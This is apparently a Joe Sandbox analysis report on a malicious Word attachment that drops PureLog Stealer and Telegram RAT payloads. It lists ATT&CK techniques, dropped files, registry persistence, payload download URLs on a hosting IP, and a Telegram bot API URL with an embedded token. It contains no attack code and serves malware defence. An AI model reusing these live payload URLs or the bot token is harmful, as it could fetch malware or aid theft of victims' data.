Source: Yara match	File source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: html.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpTrle.exe PID: 3532, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.html.exe.28cf3d0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.4f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mpTrle.exe.251d10c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mpTrle.exe.251e124.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.2c4d040.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.2c13268.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mpTrle.exe.219f414.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.2c4e058.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mpTrle.exe.219f414.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.28cf3d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mpTrle.exe.24e3334.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.398826908.00000000004F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.399016918.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.421607400.0000000002151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.421607400.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.399016918.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: html.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: html.exe PID: 3296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpTrle.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpTrle.exe PID: 4088, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	121 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	11 File and Directory Discovery	Remote Services	11 Archive Collected Data	35 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	1 DLL Side-Loading	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	31 Obfuscated Files or Information	1 Credentials in Registry	21 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	24 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
REQUEST FOR QUOTATION.docx.doc	9%	Virustotal		Browse
REQUEST FOR QUOTATION.docx.doc	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	100%	Avira	HEUR/AGEN.1305639
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Roaming\html.exe	100%	Avira	HEUR/AGEN.1305639
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe	100%	Avira	HEUR/AGEN.1305639
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\html.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe	37%	Virustotal		Browse
C:\Users\user\AppData\Roaming\html.exe	37%	Virustotal		Browse
C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	37%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
wbze.de	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://api.ipif8	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://104.168.33.34/5457/html.exeiiC:	0%	Avira URL Cloud	safe
http://104.168.33.34/5457/html.exe	0%	Avira URL Cloud	safe
http://tempuri.org/DataSet1.xsd)Microsoft	0%	Avira URL Cloud	safe
http://104.168.33.34/xampp/rzz/rz/	0%	Avira URL Cloud	safe
http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc	0%	Avira URL Cloud	safe
http://104.168.33.34/5457/html.exej	0%	Avira URL Cloud	safe
http://wbze.de/u7xc	0%	Avira URL Cloud	safe
https://wbze.de/u7xc	0%	Avira URL Cloud	safe
http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc	1%	Virustotal		Browse
http://tempuri.org/DataSet1.xsd)Microsoft	1%	Virustotal		Browse
https://wbze.de/u7xc	10%	Virustotal		Browse
http://wbze.de/u7xc	10%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.13.205	true	false		high
wbze.de	109.71.253.25	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://104.168.33.34/5457/html.exe	true	Avira URL Cloud: safe	unknown
http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://wbze.de/u7xc	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wbze.de/u7xc	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/T0	mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.dyn.com/	html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipif8	html.exe, 0000000A.00000002.656186717.0000000002932000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://104.168.33.34/5457/html.exeiiC:	EQNEDT32.EXE, 00000008.00000002.381980633.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org/p	html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/DataSet1.xsd)Microsoft	mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/	html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.ipify.org	html.exe, 0000000A.00000002.656186717.000000000293B000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.000000000249C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org	html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org/TX	html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://104.168.33.34/xampp/rzz/rz/	rz on 104.168.33.34.url.0.dr	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/Tb	mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	false		high
http://104.168.33.34/5457/html.exej	EQNEDT32.EXE, 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.71.253.25	wbze.de	Germany	207770	ATLANTIACLOUDNL	true
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
104.168.33.34	unknown	United States	36352	AS-COLOCROSSINGUS	true
172.67.74.152	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.255

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1436756
Start date and time:	2024-05-06 14:58:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	REQUEST FOR QUOTATION.docx.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@27/33@11/5
EGA Information:	Successful, ratio: 71.4%
HCA Information:	Successful, ratio: 93% Number of executed functions: 264 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
Excluded IPs from analysis (whitelisted): 23.205.165.13, 23.205.165.20, 96.17.61.58
Excluded domains from analysis (whitelisted): ssl.adobe.com.edgekey.net, armmf.adobe.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, a122.dscd.akamai.net, acroipm2.adobe.com
Execution Graph export aborted for target mpTrle.exe, PID 3532 because it is empty
Execution Graph export aborted for target mpTrle.exe, PID 4088 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:59:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run mpTrle C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
05:59:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run mpTrle C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
14:59:17	API Interceptor	86x Sleep call for process: EQNEDT32.EXE modified
14:59:21	API Interceptor	11501x Sleep call for process: html.exe modified
14:59:36	API Interceptor	11591x Sleep call for process: mpTrle.exe modified
14:59:41	API Interceptor	912x Sleep call for process: AcroRd32.exe modified
14:59:46	API Interceptor	2454x Sleep call for process: RdrCEF.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.13.205	ReturnLegend.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exe	Get hash	malicious	PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
	Sky-Beta-Setup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	ArenaWarSetup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.RATX-gen.31127.4101.exe	Get hash	malicious	PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
172.67.74.152	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta-Setup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SongOfVikings.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	SongOfVikings.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	lnvoice.js	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOOD.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	lnvoice-1205700442.pdf (4).js	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://reactivate-account.live/	Get hash	malicious	Unknown	Browse	172.67.74.152
	app.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	INVOICE KAD-0138-2024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Supplier Order Scan 0001293039493.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.13.205
	file.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	DHL_VTER000105453.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	DHL_VTER000105450.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Order4500318042.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.89.249
	#U00d6deme makbuzu ektedir.docx.doc	Get hash	malicious	Unknown	Browse	104.21.89.249
	#U00d6deme makbuzu ektedir.docx.doc	Get hash	malicious	Unknown	Browse	104.21.89.249
	FW_ New PO Acknowledgement From The Vankam Freightways.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://www.autohotkey.com/download/ahk-v2.exe	Get hash	malicious	Unknown	Browse	104.21.89.135
	https://vps91589.inmotionhosting.com/dh/dh	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://classic.dreamclass.io/pages/admissions/form/Bvtxck	Get hash	malicious	Unknown	Browse	104.17.24.14
	lnvoice.js	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://doc-54.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	3eK5m977AY.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	104.20.4.235
AS-COLOCROSSINGUS	Order4500318042.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.3.179.142
	AnYEs5xxvX.exe	Get hash	malicious	Unknown	Browse	192.227.146.252
	https://waqkqfwpfkjvqepi.com/Xapz	Get hash	malicious	Unknown	Browse	107.173.189.240
	IQU2qqn8AZ.elf	Get hash	malicious	Mirai	Browse	104.170.167.245
	0KRPn.vbs	Get hash	malicious	AgentTesla	Browse	172.245.123.18
	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse	23.94.53.100
	Confirm!!.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.227.130.26
	PIO88938MB.docx.doc	Get hash	malicious	Unknown	Browse	107.172.31.6
	QUOTATION#30810.exe	Get hash	malicious	Remcos	Browse	172.245.208.13
	youhaveonefilefortody.vbs	Get hash	malicious	AgentTesla	Browse	172.245.123.18
ATLANTIACLOUDNL	https://cranky-almeida.109-71-253-24.plesk.page/app/	Get hash	malicious	Unknown	Browse	109.71.253.24
	java.exe	Get hash	malicious	Unknown	Browse	109.71.252.45
	Dhl Waybill Document.doc	Get hash	malicious	FormBook	Browse	109.71.253.24
CLOUDFLARENETUS	Order4500318042.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.89.249
	#U00d6deme makbuzu ektedir.docx.doc	Get hash	malicious	Unknown	Browse	104.21.89.249
	#U00d6deme makbuzu ektedir.docx.doc	Get hash	malicious	Unknown	Browse	104.21.89.249
	FW_ New PO Acknowledgement From The Vankam Freightways.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://www.autohotkey.com/download/ahk-v2.exe	Get hash	malicious	Unknown	Browse	104.21.89.135
	https://vps91589.inmotionhosting.com/dh/dh	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://classic.dreamclass.io/pages/admissions/form/Bvtxck	Get hash	malicious	Unknown	Browse	104.17.24.14
	lnvoice.js	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://doc-54.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	3eK5m977AY.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	104.20.4.235

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Order4500318042.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	109.71.253.25
	#U00d6deme makbuzu ektedir.docx.doc	Get hash	malicious	Unknown	Browse	109.71.253.25
	Orden de compra 0001-00255454.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	109.71.253.25
	getinher.doc	Get hash	malicious	AgentTesla	Browse	109.71.253.25
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	109.71.253.25
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	109.71.253.25
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	109.71.253.25
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	109.71.253.25
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	109.71.253.25
	QF3YL9rOxB.rtf	Get hash	malicious	AgentTesla	Browse	109.71.253.25
7dcce5b76c8b17472d024758970a406b	Order4500318042.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	109.71.253.25
	#U00d6deme makbuzu ektedir.docx.doc	Get hash	malicious	Unknown	Browse	109.71.253.25
	Orden de compra 0001-00255454.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	109.71.253.25
	scanned fax.docx	Get hash	malicious	Unknown	Browse	109.71.253.25
	getinher.doc	Get hash	malicious	AgentTesla	Browse	109.71.253.25
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	109.71.253.25
	PAYROLL.doc	Get hash	malicious	FormBook	Browse	109.71.253.25
	Arrival Notice.doc	Get hash	malicious	FormBook	Browse	109.71.253.25
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	109.71.253.25
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	109.71.253.25
36f7277af969a6947a61ae0b815907a1	lnvoice.js	Get hash	malicious	AgentTesla	Browse	104.26.13.205 172.67.74.152
	PO 2_5_24.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.13.205 172.67.74.152
	SC-246214.doc	Get hash	malicious	AgentTesla	Browse	104.26.13.205 172.67.74.152
	OWrVfOdM62.rtf	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205 172.67.74.152
	ET2431000075 & ET2431000076.xls	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205 172.67.74.152
